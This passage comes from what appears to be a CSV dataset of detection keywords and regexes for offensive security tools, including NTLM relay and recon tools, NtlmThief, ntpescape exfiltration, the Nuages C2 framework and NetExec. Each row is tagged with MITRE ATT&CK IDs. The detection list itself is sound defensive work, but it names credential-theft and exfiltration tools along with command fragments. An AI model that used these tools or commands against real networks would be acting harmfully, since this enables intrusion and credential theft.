Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*ntlmrecon.csv*",".{0,1000}ntlmrecon\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*ntlmrecon:main*",".{0,1000}ntlmrecon\:main.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*ntlmrecon-fromfile.csv*",".{0,1000}ntlmrecon\-fromfile\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*NTLMRecon-master*",".{0,1000}NTLMRecon\-master.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*ntlmrecon-ranges.csv*",".{0,1000}ntlmrecon\-ranges\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*NTLMRelay2Self.git*",".{0,1000}NTLMRelay2Self\.git.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*ntlmRelayToEWS -*",".{0,1000}ntlmRelayToEWS\s\-.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" 
"*ntlmRelayToEWS.py*",".{0,1000}ntlmRelayToEWS\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*NtlmRelayToEWS-master*",".{0,1000}NtlmRelayToEWS\-master.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*ntlmrelayx -*",".{0,1000}ntlmrelayx\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ntlmrelayx --*",".{0,1000}ntlmrelayx\s\-\-.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ntlmrelayx.*",".{0,1000}ntlmrelayx\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*ntlmrelayx.py.log*",".{0,1000}ntlmrelayx\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*ntlmscan.py*",".{0,1000}ntlmscan\.py.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*ntlmscan-master.zip*",".{0,1000}ntlmscan\-master\.zip.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*NTLMSleuth.ps1*",".{0,1000}NTLMSleuth\.ps1.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*NTLMSleuth.sh*",".{0,1000}NTLMSleuth\.sh.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*NtlmThief.exe*",".{0,1000}NtlmThief\.exe.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*NtlmThief.sln*",".{0,1000}NtlmThief\.sln.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*NtlmThief.vcxproj*",".{0,1000}NtlmThief\.vcxproj.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*NtlmThief-main*",".{0,1000}NtlmThief\-main.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*ntlmv1.py --ntlmv1 *::*",".{0,1000}ntlmv1\.py\s\-\-ntlmv1\s.{0,1000}\:\:.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*ntlmv1.py*",".{0,1000}ntlmv1\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*ntlmv1_check*",".{0,1000}ntlmv1_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ntlmv1-multi --ntlmv1 *",".{0,1000}ntlmv1\-multi\s\-\-ntlmv1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*NtoskrnlOffsets.csv*",".{0,1000}NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*ntpescape*recv*",".{0,1000}ntpescape.{0,1000}recv.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*ntpescape*send*",".{0,1000}ntpescape.{0,1000}send.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*ntpescape-master.*",".{0,1000}ntpescape\-master\..{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but 
slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*NtRemoteLoad-main*",".{0,1000}NtRemoteLoad\-main.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*ntrights.exe*",".{0,1000}ntrights\.exe.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*NtUserMNDragOverExploit*",".{0,1000}NtUserMNDragOverExploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NtWa1tF0rS1ngle0bj3ct Executed*",".{0,1000}NtWa1tF0rS1ngle0bj3ct\sExecuted.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*Nuages*/Implants*",".{0,1000}Nuages.{0,1000}\/Implants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.clearImplants *",".{0,1000}nuages\.clearImplants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.getAutoruns*",".{0,1000}nuages\.getAutoruns.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.getImplants*",".{0,1000}nuages\.getImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.getListeners*",".{0,1000}nuages\.getListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.printImplants*",".{0,1000}nuages\.printImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages.printListeners*",".{0,1000}nuages\.printListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuages_cli.js*",".{0,1000}nuages_cli\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesC2Connector*",".{0,1000}NuagesC2Connector.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 
framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesC2Implant*",".{0,1000}NuagesC2Implant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesPythonImplant*",".{0,1000}NuagesPythonImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*NuagesSharpImplant*",".{0,1000}NuagesSharpImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*",".{0,1000}nuclei\s\-t\s\~\/tool\/nuclei\/nuclei\-templates\/cves\/CVE\-2020\-5902\.yaml\s\-l\shttps\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nuclei -t workflows/bigip-pwner-workflow.yaml*",".{0,1000}nuclei\s\-t\sworkflows\/bigip\-pwner\-workflow\.yaml.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation 
tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nuclei -u *",".{0,1000}nuclei\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*nuclei-burp-plugin*",".{0,1000}nuclei\-burp\-plugin.{0,1000}","offensive_tool_keyword","Xerror","A BurpSuite plugin intended to help with nuclei template generation.","T1583 T1595 T1190","N/A","N/A","N/A","Network Exploitation tools","https://github.com/projectdiscovery/nuclei-burp-plugin","1","1","N/A","N/A","10","1086","107","2024-04-19T08:02:59Z","2022-01-17T10:31:33Z" "*Nuke_Privileges /Process:*",".{0,1000}Nuke_Privileges\s\/Process\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*NUL0x4C/APCLdr*",".{0,1000}NUL0x4C\/APCLdr.{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","4","300","52","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*NUL0x4C/AtomLdr*",".{0,1000}NUL0x4C\/AtomLdr.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - 
TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*null-byte.com/bypass-amsi*",".{0,1000}null\-byte\.com\/bypass\-amsi.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*nullinux -rid -range *",".{0,1000}nullinux\s\-rid\s\-range\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*nullinux -shares -U *",".{0,1000}nullinux\s\-shares\s\-U\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*nullinux -users *",".{0,1000}nullinux\s\-users\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" 
"*NullSessionScanner.*",".{0,1000}NullSessionScanner\..{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","2126","254","2024-02-23T02:17:37Z","2018-08-31T17:42:48Z" "*nxc ftp *bruteforce*",".{0,1000}nxc\sftp\s.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc http *--port*",".{0,1000}nxc\shttp\s.{0,1000}\-\-port.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc ldap * --admin-count*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc ldap * 
--trusted-for-delegation*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc mssql *--get-file*",".{0,1000}nxc\smssql\s.{0,1000}\-\-get\-file.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc mssql *--local-auth*",".{0,1000}nxc\smssql\s.{0,1000}\-\-local\-auth.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc smb * -x whoami*",".{0,1000}nxc\ssmb\s.{0,1000}\s\-x\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*nxc smb *.csv -u 
